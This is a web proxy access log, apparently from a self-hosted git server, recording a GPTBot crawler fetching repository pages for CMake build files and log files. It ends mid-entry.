"/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 980605] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:15:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33677] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33678] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33678] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:46:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:46:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10806] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43112] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43108] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43109] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21750] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:15:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21748] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:15:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21749] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:15:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:15:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:15:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:15:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:15:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:15:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:15:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33648] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10809] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10809] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 30953] [Gzip 16.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:15:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 10143] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:15:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 16336] [Gzip 6.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:15:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 15924] [Gzip 10.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:15:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 117479] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:15:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9963] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 